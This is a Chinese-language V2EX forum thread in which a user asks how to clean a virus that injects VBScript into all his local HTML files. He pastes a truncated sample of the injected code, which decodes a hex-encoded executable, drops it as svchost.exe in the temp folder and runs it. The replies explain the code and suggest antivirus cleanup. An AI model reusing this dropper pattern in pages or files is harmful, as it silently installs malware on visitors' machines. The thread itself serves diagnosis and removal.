V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
billyu
V2EX  ›  问与答

是这样的,我本地的 html 文件全部被写入了一大推 VBScript 代码,新建的 html 过不了一会儿也会中招,我想问问不重装系统的话能解决么?(貌似只重装系统也没用)

  •  
  •   billyu · 2016-01-03 23:18:43 +08:00 · 7167 次点击
    这是一个创建于 3253 天前的主题,其中的信息可能已经有所发展或是发生改变。

    贴上一部分代码,因为那代码实在太长了

    <SCRIPT Language=VBScript><!--
    DropFileName = "svchost.exe"
    WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000......中间省略......5737300005669727475616C50726F7465637400005669727475616C416C6C6F6300005669727475616C467265650000004578697450726F636573730000004472616746696E697368000057696E48656C705700000000000000000000"
    Set FSO = CreateObject("Scripting.FileSystemObject")
    DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
    If FSO.FileExists(DropPath)=False Then
    Set FileObj = FSO.CreateTextFile(DropPath, True)
    For i = 1 To Len(WriteData) Step 2
    FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
    Next
    FileObj.Close
    End If
    Set WSHshell = CreateObject("WScript.Shell")
    WSHshell.Run DropPath

    14 条回复    2016-01-16 10:30:57 +08:00
    vmebeh
        1
    vmebeh  
       2016-01-03 23:23:15 +08:00
    4D5A
    M Z
    WriteData 的内容是 Windows 可执行文件

    GetSpecialFolder
    https://msdn.microsoft.com/en-us/library/a72y2t1c(v=vs.84).aspx

    把 WriteData 写到 %temp%\svchost.exe 然后执行
    xiamx
        2
    xiamx  
       2016-01-03 23:53:48 +08:00
    真有意思,这款病毒叫什么名字?
    billyu
        3
    billyu  
    OP
       2016-01-03 23:58:22 +08:00
    @xiamx 臭名昭著的 VBScript 病毒 弄得我头大
    weing104
        4
    weing104  
       2016-01-04 00:10:36 +08:00
    好吧,我也中过,结果把文件全删了
    my101du
        5
    my101du  
       2016-01-04 00:10:55 +08:00
    服务器下载下来的代码?安全狗 windows 版可以扫出来吗?
    billyu
        6
    billyu  
    OP
       2016-01-04 00:14:28 +08:00
    @weing104 文件非得全删吗 好麻烦
    billyu
        7
    billyu  
    OP
       2016-01-04 00:14:59 +08:00
    @my101du 我也不知道是怎样中的毒 今天才发现
    maskerTUI
        8
    maskerTUI  
       2016-01-04 00:25:01 +08:00 via Android   ❤️ 1
    先杀毒,干掉病毒文件,用 super replace (没记错应该是这个名字)把全部 HTML 文件的病毒代码删掉。我半年前也中过一次,不过很快就搞定了。
    maskerTUI
        9
    maskerTUI  
       2016-01-04 00:26:19 +08:00 via Android
    我当时用金山毒霸杀的,你也试试?
    billyu
        10
    billyu  
    OP
       2016-01-04 00:28:07 +08:00
    @maskerTUI 我正在用 360 扫描在 已经发现 8000 多个被感染文件
    em70
        11
    em70  
       2016-01-04 00:28:55 +08:00
    裸奔还有理了
    billyu
        12
    billyu  
    OP
       2016-01-04 00:30:50 +08:00
    @em70 你又知道啦
    zonghua
        13
    zonghua  
       2016-01-04 00:51:00 +08:00 via iPhone   ❤️ 1
    那些 U 盘快捷方式病毒也是 VBS ,解决办法就是在 Linux 系统里格式化
    GNiux
        14
    GNiux  
       2016-01-16 10:30:57 +08:00 via iPhone
    是在个人电脑中招而不是服务器?
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2644 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 25ms · UTC 11:01 · PVG 19:01 · LAX 03:01 · JFK 06:01
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.